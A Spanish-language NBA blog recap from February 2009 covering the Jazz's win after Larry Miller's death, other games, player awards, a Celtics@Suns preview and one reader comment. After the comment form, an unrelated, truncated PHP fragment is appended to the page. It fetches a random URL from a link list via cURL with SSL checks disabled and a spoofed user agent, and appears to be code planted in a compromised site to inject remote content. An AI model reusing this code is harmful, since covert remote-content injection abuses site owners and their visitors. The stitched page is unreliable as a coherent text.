La crónica (21/02/2009)

22 de February de 2009 por Jabho

Noche de homenaje, emotivo, en Sant Lake City. Un día después de la muerte de Larry Miller, los Jazz ganaron un partido importante ante los Hornets. Importante para una afición que no está disfrutando del mejor año, importante por como anda la clasificación de apretada y bonito por que lo fue. Mucho de lo que hemos disfrutado de los Jazz se lo debemos a él.

Hace un par de días nos preguntábamos quién sobraba en el Oeste. Impensable hace poco pero se ha unido un nuevo candidato a quedarse fuera: los Hornets. Andan regular  tirando a mal y ya son 7º del Oeste… Y eso que CP3 sigue a lo suyo, pero sin Chandler pierden muchos enteros bajo los tableros y eso lo notan y mucho. No es este el mejor momento para dudar en su caso. Para mi que entre ellos y los Suns está el premio de “descansar” antes de tiempo.

La jornada la abrieron los Heat, que de nuevo son de Wade y O´neal, con su victoria ante los Sixers. Buen partido de Jermaine y si se mantiene sano los Heat pueden aspirar a ser 5º en el Este y evitar cocos en primera ronda. La temporada de Wade lo merece.

En el resto de partidos Spurs y Mavericks ganaron a las cenicientas Wizards y Kings respectivamente. Los Wizards por cierto jugaron un partido lamentable. Uno mas este año. Unos luchan por ester bien colocados cara a la pottemporada y otros por estar bien colocados cara a la loteria…

Cerramos con el habitual festival de puntos en cada partido de los Warriors. Anoche victoria 1300 en la liga de Don Nelson, que ya son, ante Oklahoma que sigue viendo buena base en Westbrook-Durant-Green. Equipo a seguir de cerca desde el año que viene seguro.

PREMIOS

MVP: Me quedo con Wade y sus 25 puntos y 9 asistencias para la victoria de Miami. Varias de sus asistencias fueron a sus nuevos compañeros, O´neal y Moon. Con ellos bien los Heat veran Play Offs y darán guerra.

El rookie: Para Westbrook que con 31 puntos, 11 asistencias y 5 rebotes. Elección arriesgada la de los Thunder que de momento se está viendo más que justificada. Perdieron pero en su caso lo importante no es eso, por ahora.

La sorpresa: Viendo lo bien que está jugando este año no es una gran sopresa, pero que en un partido con Parker y Ducan por un lado y Butler y Jamison por el otro, que el máximo anotador sea Roger Mason no deja de tener su gracia. Además se enfrentaba al equipo que le dió la oportunidad de darse a conocer en la liga y se lo agradeció mostrando lo mejor de si mismo. El ex del Tau, Singletoncomparte premio con Mason y ayer, junto con Bass, restaron importancia al de nuevo flojo partido de Nowitzki.

La decepción: Unos que ya hemos visto mucho por aqui, los Wizards. Sin contar a Butler y Jamison el resto hicieron un 12 de 45… Arenas en casa debe estar temiendo recuperarse si tiene que jugar con esta banda.

El mayor esfuerzo en vano: Suele ser fácil hacer buenos números jugando contra los Warriors. El trío Westbrook-Durant-Green los hizo. Están haciendo además un año bastante esperanzador, que no es poco. Aunque queda trabajo en Oklahoma, al menos el primer paso parece dado.

RAZONES PARA TRASNOCHAR

Varios partidos en la tarde-noche del domingo y nos quedamos con…

Celtics@Suns: Jugaban uno frente a otro los dos ala-pivots titulares en el All Star… Ya no. Uno estará fuera entre 2 y 3 semanas, Garnett, y el otro, Amare, lo que resta de temporada. Curioso. Los Celtics sin Garnett perdieron en Utah y no es que vayan a tener problemas para entrar en Play Offs, ni para avanzar en ellos, pero se están jugando con los Cavs, y de reojo con Lakers, la ventaja de campo. No es un objetivo prioritario, pero visto lo visto sin duda muy, muy importante. Los Suns por su parte si se estan jugando los Play Offs. Las malas noticias es lo de Amare. Las buenas es que sin él, Richardson y Barbosa dieron un paso al frente el último partido, que volvieron a jugar más rapido trás el cambio de entrenador y que parece que Shaq no echará de menos tanto a Amare como parece. Buena piedra de toque para calibrar sus opciones de entrar en Play Offs.

El jugador a seguir es…Lamar Odom. Viene también krypto Nate enrachado, recuerda y mucho a Vinnie microondas Johnson, pero como no soy de su club de fans me quedo con Lamar, que está jugando su mejor baloncesto del año desde que se lesionó Bynum. Su cambio de rol, o la próximidad de la renovación quién sabe, ha efectuado el milagro y ahora mismo es el tercer vertice del triángulo Laker.  Con sus condiciones nos cabrea y mucho cuando se deja llevar, que es lo más habitual. Pero en las rachas que no es así da gusto verle haciendo de todo. Esperamos su mejor versión para esta noche.

Comenta

Un comentario a esta entrada

  1. TheDeerHunter dice:
    #1

    Hasta el día 15 de marzo… Boston tiene este calendario:
    -@Phoenix, Denver y Clippers…
    -Indianta, Detroit
    -@NJ
    -recibir a Cleveland y Orlando
    -visitar Miami
    recibir a los Grizzlies.

    Sin Garnett no debería extrañar demasiado un 50% de victorias/derrotas. 4-5 derrotas más. (me froto las manos maliciosamente…)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>